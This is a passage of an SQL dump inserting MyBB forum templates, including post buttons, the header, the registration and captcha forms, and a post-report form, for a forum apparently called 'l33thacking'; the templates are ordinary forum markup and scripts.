href=\"search.php?action=finduser&amp;uid={$post[\'uid\']}\" class=\"postbit\">Find</a>', '8', '1608', '', '1343953635'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1976', 'postbit_forward_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=forward\" class=\"postbit\">Forward</a>', '8', '1608', '', '1343953677'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1977', 'postbit_multiquote', '<a href=\"javascript:Thread.multiQuote({$post[\'pid\']});\" style=\"display: none;\" id=\"multiquote_link_{$post[\'pid\']}\" class=\"postbit\">Multi</a> <script type=\"text/javascript\"> //<!-- $(\'multiquote_link_{$post[\'pid\']}\').style.display = \'\'; // --> </script>', '8', '1608', '', '1343953712'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1978', 'postbit_pm', '<a href=\"private.php?action=send&amp;uid={$post[\'uid\']}\" class=\"postbit\">PM</a>', '8', '1608', '', '1343953745'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1979', 'postbit_quickdelete', '<a href=\"editpost.php?pid={$post[\'pid\']}\" onclick=\"Thread.deletePost({$post[\'pid\']}); return false;\" style=\"display: none;\" id=\"quick_delete_{$post[\'pid\']}\" class=\"postbit\">Delete</a> <script type=\"text/javascript\"> // <!-- $(\'quick_delete_{$post[\'pid\']}\').style.display = \'\'; // --> </script>', '8', '1608', '', '1343953793'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1980', 'postbit_quote', '<a href=\"newreply.php?tid={$tid}&amp;pid={$post[\'pid\']}\" class=\"postbit\">Quote</a>', '8', '1608', '', '1343953825'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1981', 'postbit_rep_button', '<a href=\"javascript:MyBB.reputation({$post[\'uid\']},{$post[\'pid\']});\" class=\"postbit\">Add Rep</a>', '8', '1608', '', '1343953929'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1982', 'postbit_reply_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=reply\" class=\"postbit\">Reply</a>', '8', '1608', '', '1343953957'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1983', 'postbit_replyall_pm', '<a href=\"private.php?action=send&amp;pmid={$id}&amp;do=replyall\" class=\"postbit\">Reply All</a>', '8', '1608', '', '1343953983'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1984', 'postbit_report', '<a href=\"javascript:Thread.reportPost({$post[\'pid\']});\" class=\"postbit\">Report</a>', '8', '1608', '', '1343954019'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1985', 'postbit_www', '<a href=\"{$post[\'website\']}\" target=\"_blank\" class=\"postbit\">Website</a>', '8', '1608', '', '1343954069'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1987', 'showthread_newreply', '<a href=\"newreply.php?tid={$tid}\" class=\"postbit\">Reply</a>&nbsp;', '8', '1608', '', '1343954232'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1988', 'showthread_newreply_closed', '<a href=\"newreply.php?tid={$tid}\" class=\"postbit\">Closed</a>&nbsp;', '8', '1608', '', '1343954277'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1989', 'postbit_warn', '<a href=\"warnings.php?action=warn&amp;uid={$post[\'uid\']}&amp;pid={$post[\'pid\']}\" class=\"postbit\">Warn</a>', '8', '1608', '', '1343954326'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1991', 'postbit_classic', '{$ignore_bit} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\"> <tr> <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"><a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a> <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br /> <span class=\"smalltext\"> {$post[\'usertitle\']}<br /> {$post[\'userstars\']} {$post[\'groupimage\']} {$post[\'useravatar\']}<br /> {$post[\'user_details\']}<!-- postbit_achivements -->{$post[\'achivementspostbit\']}<!-- /postbit_achivements --> </span> </td> <td class=\"{$altbg}\" valign=\"top\"> <table width=\"100%\"> <tr><td>{$post[\'posturl\']}<span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span> <br /> <div id=\"pid_{$post[\'pid\']}\" class=\"post_body\"> {$post[\'message\']} </div> {$post[\'attachments\']} {$post[\'signature\']} <div style=\"text-align: right; vertical-align: bottom;\" id=\"post_meta_{$post[\'pid\']}\"> <div id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</div> {$post[\'iplogged\']} </div> </td></tr> </table> </td> </tr> <tr> <td class=\"{$altbg}\" style=\"white-space: nowrap; text-align: center; vertical-align: middle;\"><span class=\"smalltext\">{$post[\'postdate\']} {$post[\'posttime\']}</span></td> <td class=\"{$altbg}\" style=\"vertical-align: middle;\"> <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\"> <tr valign=\"bottom\"> <td align=\"left\" ><span class=\"smalltext\">{$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}</span></td> <td align=\"right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}</td> </tr> </table> </td> </tr> </table>{$post[inline_ad]}', '8', '1608', '', '1345218566'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1992', 'headerinclude', '{$metadescription} {$metakeywords} <link rel=\"alternate\" type=\"application/rss+xml\" title=\"{$lang->latest_threads} (RSS 2.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php\" /> <link rel=\"alternate\" type=\"application/atom+xml\" title=\"{$lang->latest_threads} (Atom 1.0)\" href=\"{$mybb->settings[\'bburl\']}/syndication.php?type=atom1.0\" /> <meta http-equiv=\"Content-Type\" content=\"text/html; charset={$charset}\" /> <meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" /> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/prototype.js?ver=1603\"></script> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/general.js?ver=1603\"></script> <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/popup_menu.js?ver=1600\"></script> {$stylesheets} <script type=\"text/javascript\"> <!-- var cookieDomain = \"{$mybb->settings[\'cookiedomain\']}\"; var cookiePath = \"{$mybb->settings[\'cookiepath\']}\"; var cookiePrefix = \"{$mybb->settings[\'cookieprefix\']}\"; var deleteevent_confirm = \"{$lang->deleteevent_confirm}\"; var removeattach_confirm = \"{$lang->removeattach_confirm}\"; var loading_text = \'{$lang->ajax_loading}\'; var saving_changes = \'{$lang->saving_changes}\'; var use_xmlhttprequest = \"{$mybb->settings[\'use_xmlhttprequest\']}\"; var my_post_key = \"{$mybb->post_code}\"; var imagepath = \"{$theme[\'imgdir\']}\"; // --> </script> {$newpmmsg} <script type=\"text/javascript\" src=\"{$mybb->settings[\'bburl\']}/jscripts/tabcontent.js\"> /*********************************************** * Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com) * This notice MUST stay intact for legal use * Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code ***********************************************/ </script>', '8', '1608', '', '1343954663'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1993', 'forumdisplay_subforums', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"6\" align=\"center\"><strong>{$lang->sub_forums_in}</strong></td> </tr> <tr> <td class=\"tcat\" width=\"2%\">&nbsp;</td> <td class=\"tcat\" width=\"59%\"><span class=\"smalltext\"><strong>{$lang->forumbit_forum}</strong></span></td> <td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_threads}</strong></span></td> <td class=\"tcat\" width=\"7%\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->forumbit_posts}</strong></span></td> <td class=\"tcat\" width=\"15%\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->forumbit_lastpost}</strong></span></td> </tr> {$forums} </table> <br />', '8', '1608', '', '1344010593'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1995', 'moderation_getip', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->get_post_ip}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->get_post_ip}</strong></td> </tr> <tr> <td class=\"trow1\" width=\"20%\"><strong>{$lang->username}</strong></td> <td class=\"trow1\">{$username}</td> </tr> <tr> <td class=\"trow2\"><strong>{$lang->ip_address}</strong></td> <td class=\"trow2\">{$post[\'ipaddress\']}</td> </tr> <tr> <td class=\"trow1\"><strong>{$lang->hostname}<br /><span class=\"smalltext\">{$lang->if_resolvable}</span></strong></td> <td class=\"trow2\">{$hostname}</td> </tr> <tr> <td class=\"trow1\"><strong>Who is Lookup<br /><span class=\"smalltext\"></span></strong></td> <td class=\"trow2\"><a href=\"http://whois.domaintools.com/{$post[\'ipaddress\']}\">Click here to do a Whois Search</a></td> </tr> {$modoptions} </table> {$footer} </body> </html>', '8', '1608', '', '1344036190'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1996', 'postbit_iplogged_hiden', '<!--<p class=\"smalltext\">{$lang->postbit_ipaddress} <a href=\"moderation.php?action=getip&amp;pid={$post[\'pid\']}\">{$lang->postbit_ipaddress_logged}</a></p>--> <p class=\"smalltext\">{$lang->postbit_ipaddress} <a href=\"moderation.php?action=getip&amp;pid={$post[\'pid\']}\">{$post[\'ipaddress\']}</a></p>', '8', '1608', '', '1344036534'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1997', 'memberlist_user', '<tr> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'avatar\']}</td> <td class=\"{$alt_bg}\">{$user[\'profilelink\']}<br /> <span class=\"smalltext\"> {$user[\'usertitle\']}<br /> {$usergroup[\'groupimage\']} {$user[\'userstars\']} </span></td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'regdate\']}</td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'lastvisit\']}</td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'reputation\']}</td> <td class=\"{$alt_bg}\" align=\"center\">{$user[\'postnum\']}</td> {$referral_bit} </tr>', '8', '1608', '', '1344037121'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1998', 'member_register', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->registration}</title> {$headerinclude} <script type=\"text/javascript\" src=\"jscripts/validator.js\"></script> </head> <body> {$header} <br /> <form action=\"member.php\" method=\"post\" id=\"registration_form\"><input type=\"text\" style=\"visibility: hidden;\" value=\"\" name=\"regcheck1\" /><input type=\"text\" style=\"visibility: hidden;\" value=\"true\" name=\"regcheck2\" /> {$regerrors} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"thead\" colspan=\"2\"><strong>{$lang->registration}</strong></td> </tr> <tr> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->account_details}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"username\">{$lang->username}</label></span></td> </tr> <tr> <td colspan=\"2\"><input type=\"text\" class=\"textbox\" name=\"username\" id=\"username\" style=\"width: 100%\" value=\"{$username}\" /></td> </tr> {$passboxes} <tr> <td><span class=\"smalltext\"><label for=\"email\">{$lang->email}</label></span></td> <td><span class=\"smalltext\"><label for=\"email2\">{$lang->confirm_email}</label></span></td> </tr> <tr> <td></ br><span class=\"smalltext\"><font color=\"00ff00\">Please check the SPAM MAIL folder if by chance you didn\'t got activation email, it would be there.</font></td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"email\" id=\"email\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email}\" /></td> <td><input type=\"text\" class=\"textbox\" name=\"email2\" id=\"email2\" style=\"width: 100%\" maxlength=\"50\" value=\"{$email2}\" /></td> </tr> <tr> <td colspan=\"2\" style=\"display: none;\" id=\"email_status\">&nbsp;</td> </font> </tr> <tr> </tr> <tr> {$hiddencaptcha} </table> </fieldset> {$requiredfields} {$referrer} {$regimage} </td> <td width=\"50%\" class=\"trow1\" valign=\"top\"> <fieldset class=\"trow2\"> <legend><strong>{$lang->account_prefs}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"allownotices\" id=\"allownotices\" value=\"1\" {$allownoticescheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"allownotices\">{$lang->allow_notices}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"hideemail\" id=\"hideemail\" value=\"1\" {$hideemailcheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"hideemail\">{$lang->hide_email}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"receivepms\" id=\"receivepms\" value=\"1\" {$receivepmscheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"receivepms\">{$lang->receive_pms}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"pmnotice\" id=\"pmnotice\" value=\"1\"{$pmnoticecheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"pmnotice\">{$lang->pm_notice}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"emailpmnotify\" id=\"emailpmnotify\" value=\"1\" {$emailpmnotifycheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"emailpmnotify\">{$lang->email_notify_newpm}</label></span></td> </tr> <tr> <td valign=\"top\" width=\"1\"><input type=\"checkbox\" class=\"checkbox\" name=\"invisible\" id=\"invisible\" value=\"1\" {$invisiblecheck} /></td> <td valign=\"top\"><span class=\"smalltext\"><label for=\"invisible\">{$lang->invisible_mode}</label></span></td> </tr> <tr> <td colspan=\"2\"><span class=\"smalltext\"><label for=\"subscriptionmethod\">{$lang->subscription_method}</label></span></td> </tr> <tr> <td colspan=\"2\"> <select name=\"subscriptionmethod\" id=\"subscriptionmethod\"> <option value=\"0\" {$no_subscribe_selected}>{$lang->no_auto_subscribe}</option> <option value=\"1\" {$no_email_subscribe_selected}>{$lang->no_email_subscribe}</option> <option value=\"2\" {$instant_email_subscribe_selected}>{$lang->instant_email_subscribe}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong><label for=\"timezone\">{$lang->time_offset}</label></strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td><span class=\"smalltext\">{$lang->time_offset_desc}</span></td> </tr> <tr> <td>{$tzselect}</td> </tr> <tr> <td><span class=\"smalltext\">{$lang->dst_correction}</span></td> </tr> <tr> <td> <select name=\"dstcorrection\"> <option value=\"2\" {$dst_auto_selected}>{$lang->dst_correction_auto}</option> <option value=\"1\" {$dst_enabled_selected}>{$lang->dst_correction_enabled}</option> <option value=\"0\" {$dst_disabled_selected}>{$lang->dst_correction_disabled}</option> </select> </td> </tr> </table> </fieldset> <br /> <fieldset class=\"trow2\"> <legend><strong><label for=\"language\">{$lang->lang_select}</label></strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\" width=\"100%\"> <tr> <td colspan=\"2\"><span class=\"smalltext\">{$lang->lang_select_desc}</span></td> </tr> <tr> <td><select name=\"language\" id=\"language\"><option value=\"\">{$lang->lang_select_default}</option><option value=\"\">-----------</option>{$langoptions}</select></td> </tr> </table> </fieldset> </td> </tr> </table> <br /> <div align=\"center\"> <input type=\"hidden\" name=\"step\" value=\"registration\" /> <input type=\"hidden\" name=\"action\" value=\"do_register\" /> <input type=\"submit\" class=\"button\" name=\"regsubmit\" value=\"{$lang->submit_registration}\" /> </div> </form> <script type=\"text/javascript\"> <!-- regValidator = new FormValidator(\'registration_form\'); regValidator.register(\'username\', \'notEmpty\', {failure_message:\'{$lang->js_validator_no_username}\'}); regValidator.register(\'email\', \'regexp\', {match_field:\'email2\', regexp:\'^([a-zA-Z0-9_\\\\.\\\\+\\\\-])+\\\\@(([a-zA-Z0-9\\\\-])+\\\\.)+([a-zA-Z0-9]{2,4})+$\', failure_message:\'{$lang->js_validator_invalid_email}\'}); regValidator.register(\'email2\', \'matches\', {match_field:\'email\', status_field:\'email_status\', failure_message:\'{$lang->js_validator_email_match}\'}); {$validator_extra} regValidator.register(\'username\', \'ajax\', {url:\'xmlhttp.php?action=username_availability\', loading_message:\'{$lang->js_validator_checking_username}\'}); // needs to be last // --> </script> {$footer} </body> </html>', '8', '1608', '', '1347237783'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('1999', 'member_register_password', '<tr> <td><span class=\"smalltext\">{$lang->password}</span></td> <td><span class=\"smalltext\">{$lang->confirm_password}</span></td> </tr> <tr> <td><input type=\"password\" class=\"textbox\" name=\"password\" id=\"password\" style=\"width: 100%\" /></td> <td><input type=\"password\" class=\"textbox\" name=\"password2\" id=\"password2\" style=\"width: 100%\" /></td> </tr> <tr> <td colspan=\"2\" style=\"display: none;\" id=\"password_status\">&nbsp;</td> </tr> </span>', '8', '1608', '', '1347174323'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2048', 'member_profile_email', '<tr> <td class=\"trow2\"><strong>{$lang->email}</strong></td> <td class=\"trow2\"><a href=\"member.php?action=emailuser&amp;uid={$memprofile[\'uid\']}\">{$lang->send_user_email}</a></td> </tr>', '8', '1608', '', '1347237828'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2000', 'report', '<html> <head> <title>{$mybb->settings[\'bbname\']} - {$lang->report_post}</title> {$headerinclude} </head> <body> <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr> <td class=\"trow1\" align=\"center\"> <br /> <br /> <strong>{$lang->report_to_mod}</strong> <form action=\"report.php\" method=\"post\"> <input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" /> <input type=\"hidden\" name=\"action\" value=\"do_report\" /> <input type=\"hidden\" name=\"pid\" value=\"{$pid}\" /> <blockquote>Please report content that you think violate l33thacking rules and regulations. All reports will be dealt in their own time or the staff member has not decided to take an action on the report.</blockquote> <br /> <br /> <span class=\"smalltext\">{$lang->report_reason}</span> <br /> <SELECT NAME=\"reason\"> <OPTION VALUE=\"Ignore this report\" >Select the appropriate reason below <OPTION VALUE=\"Adult Content\" >Adult Content <OPTION VALUE=\"Cross Posting\" >Cross Posting <OPTION VALUE=\"Disallowed BH\" >Forbidden Blackhat Activity <OPTION VALUE=\"Donation begging\" >Donation Begging <OPTION VALUE=\"Infected/No scan\" >Infected Download/Link or No virus scan <OPTION VALUE=\"Leech\" >Leeched post <OPTION VALUE=\"LQP\" >Low Quality Post <OPTION VALUE=\"Off topic\" >Off Topic or Unrelated <OPTION VALUE=\"Personal info\" >Personal Data <OPTION VALUE=\"Profile Violation\" >Profile Violation <OPTION VALUE=\"Post & PM\" > Post & PM <OPTION VALUE=\"Rep Abuse\" >Reputation Abuse <OPTION VALUE=\"SPAM\" >spam <OPTION VALUE=\"Threats\" >Threats or Harassment <OPTION VALUE=\"Wrong forum\" >Wrong Section <OPTION VALUE=\"Nonsense(Other)\" >Other </SELECT> <br /> <br /> <div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->report_post}\" /></div> </form> </td> </tr> </table> </body> </html>', '8', '1608', '', '1352577597'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2001', 'postbit_warninglevel', '<br />{$lang->postbit_warning_level} <a href=\"{$warning_link}\"><span style=\"color: grey;\">{$warning_level}</span></a>', '8', '1608', '', '1344902397'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2002', 'reputation_vote', '<tr> <td class=\"trow1 {$status_class}\"> {$reputation_vote[\'username\']} <span class=\"smalltext\">{$reputation_vote[\'user_reputation\']} - {$last_updated} <!-- editlink{$reputation_vote[\'rid\']} --> {$delete_link}<br />{$postrep_given}<br /></span> <strong class=\"{$vote_type_class}\">{$vote_type} {$vote_reputation}:</strong> <span style=\"color: black;\"> {$reputation_vote[\'comments\']}</span> </td> </tr>', '8', '1608', '', '1344966352'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2003', 'header_welcomeblock_member_admin', '&mdash; <a href=\"{$mybb->settings[\'bburl\']}/{$config[\'admin_dir\']}/index.php\"><strong><span style=\"color: silver;\">{$lang->welcome_admin}</span></strong></a>', '8', '1608', '', '1347685279'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2004', 'header_welcomeblock_member_moderator', '&mdash; <a href=\"{$mybb->settings[\'bburl\']}/modcp.php\"><strong><i><span style=\"color: silver;\">{$lang->welcome_modcp}</span></i></strong></a>', '8', '1608', '', '1347685290'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2005', 'modcp_reports_report', '<tr> <td class=\"{$trow}\" align=\"center\"><label for=\"reports_{$report[\'rid\']}\"><a href=\"{$report[\'postlink\']}#pid{$report[\'pid\']}\" target=\"_blank\"><span style=\"color: blue;\">{$report[\'pid\']}</span></a></label></td> <td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'posterlink\']}\" target=\"_blank\"><span style=\"color: green;\">{$report[\'postusername\']}</span></a></td> <td class=\"{$trow}\"><a href=\"{$report[\'threadlink\']}\" target=\"_blank\"><span style=\"color: red;\">{$report[\'threadsubject\']}</a></td> <td class=\"{$trow}\" align=\"center\"><a href=\"{$report[\'reporterlink\']}\" target=\"_blank\"><span style=\"color: green;\">{$report[\'username\']}</span></a></td> <td class=\"{$trow}\"><span style=\"color: black;\">{$report[\'reason\']}</span></td> <td class=\"{$trow}\" align=\"center\" style=\"white-space: nowrap\"><span class=\"smalltext\"><span style=\"color: grey;\">{$reportdate}</span><br /><span style=\"color: grey;\">{$reporttime}</span></small></td> <td class=\"{$trow}\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"reports[]\" id=\"reports_{$report[\'rid\']}\" value=\"{$report[\'rid\']}\" /></td> </tr>', '8', '1608', '', '1345121292'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2006', 'member_register_regimage', '<br /> <fieldset class=\"trow2\"> <script type=\"text/javascript\" src=\"jscripts/captcha.js?ver=1400\"></script> <legend><strong>{$lang->image_verification}</strong></legend> <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\"> <tr> <td><span class=\"smalltext\">{$lang->verification_note}</span></td> <td rowspan=\"2\" align=\"center\"><img src=\"captcha.php?action=regimage&amp;imagehash={$imagehash}\" alt=\"{$lang->image_verification}\" title=\"{$lang->image_verification}\" id=\"captcha_img\" /><br /><span style=\"color: red;\" class=\"smalltext\">{$lang->verification_subnote}</span> <script type=\"text/javascript\"> <!-- if(use_xmlhttprequest == \"1\") { document.write(\'<br \\/><br \\/><input type=\"button\" class=\"button\" tabindex=\"10000\" name=\"refresh\" value=\"{$lang->refresh}\" onclick=\"return captcha.refresh();\" \\/>\'); } // --> </script> </td> </tr> <tr> <td><input type=\"text\" class=\"textbox\" name=\"imagestring\" value=\"\" id=\"imagestring\" style=\"width: 85%;\" /><input type=\"hidden\" name=\"imagehash\" value=\"{$imagehash}\" id=\"imagehash\" /></td> </tr> <tr> <td id=\"imagestring_status\" style=\"display: none;\" colspan=\"2\">&nbsp;</td> </tr> </table> </fieldset>', '8', '1608', '', '1345142498'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2007', 'postbit_signature', '<hr size=\"1\" width=\"30%\" align=\"center\" /> {$post[\'signature\']}', '8', '1608', '', '1345142765'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2011', 'moderation_posts', ' <div class=\"red_alert\"> Moderator Notice: Unapprove Threads: <a href=\"modcp.php?action=modqueue&type=threads\">{$unappt}</a> and Unapprove Posts: <a href=\"modcp.php?action=modqueue&type=posts\">{$unappp}</a>. </div> <br />', '-1', '0', '', '0'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2012', 'header', ' <div id=\"container\"> <a name=\"top\" id=\"top\"></a> <div id=\"header\"> <div class=\"logo\"><a href=\"{$mybb->settings[\'bburl\']}/index.php\"><img src=\"{$theme[\'logo\']}\" alt=\"{$mybb->settings[\'bbname\']}\" title=\"{$mybb->settings[\'bbname\']}\" /></a></div> <div class=\"menu\"> <ul><img src=\"images/mods.png\"><a href=\"mods.php\">Mods Database</a> <li><a href=\"{$mybb->settings[\'bburl\']}/search.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/search.gif\" alt=\"\" title=\"\" />{$lang->toplinks_search}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/memberlist.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/memberlist.gif\" alt=\"\" title=\"\" />{$lang->toplinks_memberlist}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/calendar.php\"><img src=\"{$theme[\'imgdir\']}/toplinks/calendar.gif\" alt=\"\" title=\"\" />{$lang->toplinks_calendar}</a></li> <li><a href=\"{$mybb->settings[\'bburl\']}/misc.php?action=help\"><img src=\"{$theme[\'imgdir\']}/toplinks/help.gif\" alt=\"\" title=\"\" />{$lang->toplinks_help}</a></li> </ul> </div> <hr class=\"hidden\" /> <div id=\"panel\"> {$welcomeblock} </div> </div> <hr class=\"hidden\" /> <br class=\"clear\" /> <div id=\"content\"> {$pm_notice} {$bannedwarning} {$bbclosedwarning} {$unreadreports}{$moderation_posts} {$pending_joinrequests} <navigation> {$affiliates_header} <br /> ', '1', '1608', '', '1345243126'); INSERT INTO `mybb_templates` (`tid`, `title`, `template`, `sid`, `version`, `status`, `dateline`) VALUES ('2013', 'mods', ' <html> <head> <title>{$mybb->settings[\'modstitle\']}</title> {$headerinclude} </head> <body> {$header} <table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\"> <tr><td class=\"thead\"><strong>{$mybb->settings[\'modstitle\']}</strong></td></tr> <tr><td class=\"trow1\"> {$mybb->settings[\'anytxt\']}<br/> <table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-style:solid; border-color:#FF870F; border-collapse: collapse; \" bordercolor=\"#111111\" width=\"100%\"> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><b><font size=\"2\">My Codes:</font></b></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Custom MyCodes will be placed here.</b></font></td> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>Admin CP:</b></font></p> <p style=\"margin-top: 0; margin-bottom: 0\"><font size=\"2\"><b>These plugins will modify your forum\'s Admin CP.</b></font></td> </tr> <tr> <td width=\"50%\" valign=\"top\" style=\"border: 1px solid #FF870F; \"> <font 